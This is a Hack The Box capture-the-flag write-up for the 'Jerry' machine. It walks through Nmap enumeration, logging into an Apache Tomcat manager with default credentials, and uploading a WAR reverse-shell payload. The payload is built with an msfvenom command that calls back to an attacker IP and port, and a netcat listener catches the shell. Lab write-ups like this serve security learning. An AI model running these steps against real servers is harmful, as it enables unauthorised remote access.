Hack The Box Jerry Write-Up

Enumeration

Nmap

Nmap reveals that port number 8080 is open, let’s visit the port number 8080 in web browser.

Apache Tomcat/7.0.88

Basic access authentication

To access Tomcat manger we need a valid Username and Password, When we enter any invalid Username and Password we will get a 403 Access Denied message.

403 Acess Denied

Let’s try the Username : tomacat and password : s3cret

Once we successfully authenticate were brought to the Tomcat Web Application . The Tomcat manager has an option to upload .war files to the server.

Tomcat Web Application Manager

Exploitation

We can use msfvenom to generate a java payload for reverse shell with .war extension

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f war > cmd.war

Upload and Deploy the reverse shell then visit http://10.10.10.95:8080/cmd/

Let’s open a netcat Listener to get the shell which will be generated after our cmd.war file gets executed.

The Flag is located in

C:\Users\Administrator\Desktop\flags

The user and root flags are written in 2 for the price of 1.txt file and it can be read using type command.

type "2 for the price of 1.txt"